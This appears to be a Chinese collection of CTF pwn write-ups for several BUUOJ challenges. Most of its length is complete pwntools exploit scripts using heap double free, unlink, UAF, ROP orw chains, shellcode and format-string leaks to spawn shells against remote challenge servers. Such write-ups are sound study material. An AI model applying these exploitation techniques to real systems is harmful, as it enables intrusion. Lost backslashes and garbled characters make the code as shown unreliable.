此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码!
-2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648
护网杯_2018_gettingstart
此时又要用到我们的数学知识!
转换浮点数工具
from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './2018_gettingStart' r = remote('node4.buuoj.cn',29971) elf = ELF(binary) payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A) sleep(0.3) r.sendline(payload) r.interactive()
ciscn_2019_final_2
分析主要函数!
Allocate申请函数!
Free释放函数!
Show打印函数!
Exit退出函数!
本题设计IO,故进行细致分析,大致思路为采用UAF漏洞,打印出libc等低地址,进而计算出偏差,重写低地址,修改fd指向stdin+0x70位置,设置为666,进行输入 *** 作!
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
此时通过连续Free(2)达成tcache的double free,需注意Free之间需要Allocate申请一次,设置bool为1即可释放!
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
[Tab] Free(1)#tcache填充
[Tab] Allocate(2)
Free(1)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols[‘IO_2_1_stdin’]-libc.symbols[’__malloc_hook’]))
此时填充tcache[0x90],并泄露出libc上低4位字节,可以计算出_IO_2_1_stdin_与__malloc_hook的偏移量!
Allocate(1,str(stdin_low+0x70))#对已存在的libc的低地址进行覆写
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)#泄露出heap上低4位字节
此时重复泄露出heap上的低4位字节,为接下来的修改fd指针作准备!
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
此时重新对tcache的fb指针进行布局!重写_fileno(_fileno 返回文件描述符)
由上一系列的流程进而可以得到flag
from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './ciscn_final_2' r = remote('node4.buuoj.cn',25631) #r = process(binary) elf = ELF(binary) libc = ELF('./libc-2.27.so') #libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so') def Allocate(choice=1,payload='1n'): r.sendlineafter("which command?n> ",'1') r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice)) r.sendafter("your inode number:",payload) def Free(choice=1): r.sendlineafter("which command?n> ",'2') r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice)) def Show(choice=1): r.sendlineafter("which command?n> ",'3') r.sendlineafter("TYPE:n1: intn2: short intn>",str(choice)) r.recvuntil("number :") if choice==1: return int(r.recvuntil('n')[:-1],10)&0xffffffff else: return int(r.recvuntil('n')[:-1],10)&0xffff def Exit(): r.sendlineafter("which command?n> ",'4') Allocate() Free() Allocate(2) Allocate(2) Allocate(2) Allocate(2) Free(2) Allocate() Free(2) heap_low_addr = Show(2) Allocate(2,str(heap_low_addr-0xa0)) Allocate(2,str(heap_low_addr-0xa0)) Allocate(2,str(0x91)) for i in range(7): Free(1)#tcache Allocate(2) Free(1) #gdb.attach(r) main_arena_low = Show(1)-96 stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook'])) Allocate(1,str(stdin_low+0x70)) Allocate() Free(1) Allocate(2) Free(1) new_heap_addr = Show(1) Allocate(1,str(new_heap_addr-0x30)) Allocate(1,str(new_heap_addr-0x30)) Allocate(1) Allocate(1,str(666)) success(hex(new_heap_addr)) success(hex(main_arena_low)) success(hex(stdin_low)) #gdb.attach(r) Exit() r.interactive()
[OGeek2019]bookmanager
函数过程较为复杂,其实较为多,不仔细分析了,使用Unlink手法进行攻击__free_hook,经过多次尝试发现__malloc_hook或__realloc_hook无法获取权限,故对__free_hook进行覆写。
本题难度主要是对函数进行分析.攻击手法难度较低!
位于Edit函数存在堆溢出漏洞!
from unittest.main import main from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './pwn' #r = process(binary) r = remote('node4.buuoj.cn',27418) elf = ELF(binary) libc = ELF('./libc-2.23.so') #libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so') def start(): r.sendlineafter("create: ",'njh') def Allocate(chapterName='abn'): r.sendlineafter("Your choice:",'1') r.sendlineafter("Chapter name:",chapterName) def AllocateSect(chapterName,sectionName): r.sendlineafter("Your choice:",'2') r.sendlineafter("add into:",str(chapterName)) r.recvuntil("0x") addr = int(r.recvline()[:-1],16) r.sendlineafter("Section name:",str(sectionName)) return addr def AllocateText(sectionName,size=0x18,payload='n'): r.sendlineafter("Your choice:",'3') r.sendlineafter("add into:",str(sectionName)) r.sendlineafter("write:",str(size)) r.sendlineafter("Text:",payload) def Free(chapterName): r.sendlineafter("Your choice:",'4') r.sendlineafter("Chapter name:",str(chapterName)) def FreeSect(sectionName): r.sendlineafter("Your choice:",'5') r.sendlineafter("Section name:",str(sectionName)) def FreeText(sectionName): r.sendlineafter("Your choice:",'6') r.sendlineafter("Section name:",str(sectionName)) def Book(): r.sendlineafter("Your choice:",'7') def Edit(choice,new,sectionName=''): r.sendlineafter("Your choice:",'8') if choice == 1: r.sendlineafter("(Chapter/Section/Text):",'Chapter') r.sendlineafter("Chapter name:",new) elif choice == 2: r.sendlineafter("(Chapter/Section/Text):",'Section') r.sendlineafter("New Section name:",new) else: r.sendlineafter("(Chapter/Section/Text):",'Text') r.sendlineafter("Section name:",str(sectionName)) r.sendlineafter("New Text:",new) sectionaddr = [] start() Allocate('/bin/sh') target = AllocateSect('/bin/sh','1')+0x20 AllocateSect('/bin/sh','2') AllocateSect('/bin/sh','3') fd = target-0x18 bk = target-0x10 AllocateText('1',0x88) AllocateText('2',0x88) AllocateText('3') AllocateText('3') AllocateText('3',0x18,b'/bin/shx00') Edit(3,p64(0)+p64(0x81)+p64(fd)+p64(bk)+12*p64(0)+p64(0x80)+p64(0x90),'1') FreeText('2') AllocateText('2',0x70,b'a'*8) Book() r.recvuntil(b'aaaaaaaa') main_arena = u64(r.recv(6).ljust(8,b'x00'))-344 libc_base = main_arena-0x10-libc.symbols['__malloc_hook'] realloc = libc_base+libc.symbols['__libc_realloc'] one = [0x45206,0x4525a,0xef9f4,0xf0897] Edit(3,b'a'*0x18+p64(libc_base+libc.symbols['__free_hook']),'1') Edit(3,p64(libc_base+libc.symbols['system']),'1') success(hex(target)) success(hex(main_arena)) #gdb.attach(r) Free('/bin/sh') r.interactive()
ciscn_2019_final_4
House of Spirit
该ELF存在反调试,故我们利用ida进行patch!
经过分析主要函数!发现仅仅存在UAF漏洞,不存在其它漏洞,没有Edit编辑函数。
发现采用覆写__malloc_hook的方法失效,故此时我们采用覆写到栈地址上,覆写rip!
本题脚本较大(臃肿),但分步来分析的话相对比较简单!
start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil(’x7f’)[-6:].ljust(8,b’x00’))-88
libc_base = main_arena-0x10-libc.symbols[’__malloc_hook’]
malloc_hook = libc_base+libc.symbols[’__malloc_hook’]
realloc = libc_base+libc.symbols[’__libc_realloc’]
environ_addr = libc_base+libc.symbols[‘environ’]
首先我们通过unsorted bin特性泄露出libc基地址
Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b’x7f’)[-6:].ljust(8,b’x00’))-0x210
read_addr = libc_base+libc.symbols[‘read’]
此时我们利用double free漏洞得到bss段上的全局变量的chunk,从而修改全局变量来泄露environ内容得到栈地址!
此时能够泄露出栈地址!
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b’n’
Allocate(0x78,payload)#14
此时再次利用double free能够申请得到栈上地址,并写入ROP,此时我们覆写malloc_hook为add rsp;ret即可抬升rsp,并且执行ROP,此时我们能往里面进行写入0x1000大小内容,完成orw!
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b’a’*0x13+p64(libc_base+add_rsp48))
r.sendlineafter(">> ",‘1’)
r.sendlineafter(“size?”,‘10’)
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols[‘openat’]+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols[‘puts’]+libc_base)+b’/flagx00x00x00’
sleep(0.1)
r.send(payload)
此时我们利用该流程,便可以得到flag!
from pwn import * context(os='linux',arch='amd64',log_level='debug') binary = './ciscn_final_4' r = remote('node4.buuoj.cn',28544) #r = process(binary) elf = ELF(binary) libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so') libc = ELF('./libc-2.23.so') pop_rsi_ret = 0x0202e8#0x0202e8 pop_rdi_ret = 0x021102#0x021102 pop_rdx_ret = 0x001b92#0x001b92 add_rsp48 = 0x00c9f81#0x00c9551 note_addr = 0x06020C0 def start(): r.sendlineafter("what is your name? ",p64(0x81)+b'njh') def Allocate(size=0x18,payload='n'): r.sendlineafter(">> ",'1') r.sendlineafter("size?",str(size)) r.sendafter("content?",payload) def Free(index): r.sendlineafter(">> ",'2') r.sendlineafter("index ?",str(index)) def Show(index): r.sendlineafter(">> ",'3') r.sendlineafter("index ?",str(index)) start() Allocate(0x88)#0 Allocate()#1 Free(0) Show(0) main_arena = u64(r.recvuntil('x7f')[-6:].ljust(8,b'x00'))-88 libc_base = main_arena-0x10-libc.symbols['__malloc_hook'] malloc_hook = libc_base+libc.symbols['__malloc_hook'] realloc = libc_base+libc.symbols['__libc_realloc'] environ_addr = libc_base+libc.symbols['environ'] Allocate(0x88)#2 leak libc Allocate(0x78)#3 Allocate(0x78)#4 Allocate()#5 Allocate(0x88)#6 Free(3) Free(4) Free(3) Allocate(0x78,p64(note_addr-0x70))#7 Allocate(0x78)#8 Allocate(0x78)#9 Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10 Show(0)# leak stack stack_addr = u64(r.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))-0x210 read_addr = libc_base+libc.symbols['read'] Free(3) Free(4) Free(3) Allocate(0x78,p64(stack_addr))#11 Allocate(0x78)#12 Allocate(0x78)#13 payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'n' Allocate(0x78,payload)#14 Allocate(0x68)#15 Allocate(0x68)#16 Allocate()#17 Free(15) Free(16) Free(15) Allocate(0x68,p64(malloc_hook-0x23)) Allocate(0x68) Allocate(0x68) Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48)) success(hex(note_addr)) success(hex(main_arena)) success(hex(environ_addr)) success(hex(stack_addr)) #gdb.attach(r,'b *0x0000000000400B2C') r.sendlineafter(">> ",'1') r.sendlineafter("size?",'10') flag = stack_addr+0xd8 payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base) payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr) payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flagx00x00x00' sleep(0.1) r.send(payload) r.interactive()
starctf_2019_babyshell
逻辑比较简单!
check函数检测shellcode是否匹配data段上的一串数据,如下
此时我们只要输入的shellcode从其中选择即可!
此时我们选择调整rdi与rdx的值,并且调用syscall进行sys_read,并输入sh执行函数!
或者我们可以利用x00跳出循环比较,从而执行sh函数!如’x00J’+’x00’ 或 ‘x00B3’
from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './starctf_2019_babyshell' r = remote('node4.buuoj.cn',27400) #r = process(binary) elf = ELF(binary) #gdb.attach(r,'b *0x004008C6') r.recvuntil("give me shellcode, plz:") payload = asm('pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdi;syscall') r.send(payload) sleep(0.1) r.send(b'a'*0xc+asm(shellcraft.sh())) r.interactive()
wustctf2020_easyfast
简单的double
简单的UAF堆题目!
from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './wustctf2020_easyfast' r = remote('node4.buuoj.cn',26675) #r = process(binary) elf = ELF(binary) libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so') shell_addr = 0x0602090 def Allocate(size=0x18): r.sendlineafter("choice>n",'1') r.sendlineafter("size>n",str(size)) def Free(index): r.sendlineafter("choice>n",'2') r.sendlineafter("index>n",str(index)) def Edit(index,payload='n'): r.sendlineafter("choice>n",'3') r.sendlineafter("index>n",str(index)) r.send(payload) def Shell(): r.sendlineafter("choice>n",'4') Allocate(0x48)#0 Allocate(0x48)#1 Free(0) Edit(0,p64(shell_addr-0x10)) Allocate(0x48)#2 Allocate(0x48)#3 Edit(3,p64(0)) success(hex(shell_addr)) #gdb.attach(r) Shell() r.interactive()
wustctf2020_name_your_dog
存在局限的任意地址写漏洞,较为简单!
经过计算可以修改scanf@got为后门函数地址!
from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './wustctf2020_name_your_dog' r = remote('node4.buuoj.cn',27072) #r = process(binary) elf = ELF(binary) shell_addr = 0x080485CB dogs = 0x0804A060 def nameWhich(offset,payload): r.sendlineafter("Name for which?n>",str(offset)) r.sendlineafter("Give your name plz: ",payload) nameWhich('-7',p64(shell_addr)) r.interactive()
ciscn_2019_en_3
该文件出现了FORTIFY保护!
本题较为简单,2.27的double free,本意想要采用house of sprite!但是经过实践该方法复杂且无法绕过canary。故还是老老实实采用double free最简单的方式来获取权限!
from pwn import * context(os='linux',arch='amd64',log_level='debug') binary = './ciscn_2019_en_3' r = remote('node4.buuoj.cn',26765) #r = process(binary) elf = ELF(binary) #libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so') libc = ELF('./libc-2.27.so') def Allocate(size=0x18,payload='n'): r.sendlineafter("Input your choice:",'1') r.sendlineafter("story: ",str(size)) r.sendafter("story: ",payload) def Free(index): r.sendlineafter("Input your choice:",'4') r.sendlineafter("Please input the index:",str(index)) #gdb.attach(r) r.sendlineafter("What's your name?",'%p%p%p%p.%p,%p%p%p%p%p%p%p.%p,') r.recvuntil(".0x") libc_base = int(r.recv(12),16)-libc.symbols['_IO_file_jumps'] r.recvuntil(".0x") stack_addr = int(r.recv(12),16)-0x138 free_hook = libc_base+libc.symbols['__free_hook'] system = libc_base+libc.symbols['system'] success("stack_addr -> "+hex(stack_addr)) success("libc_base -> "+hex(libc_base)) r.sendafter("Please input your ID.",p64(0x71)) Allocate()#0 Allocate(0x18,b'/bin/shx00')#1 Free(0) Free(0) Allocate(0x18,p64(free_hook)) Allocate()#2 Allocate(0x18,p64(system)) success(hex(free_hook)) #gdb.attach(r) Free(1) r.interactive()
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)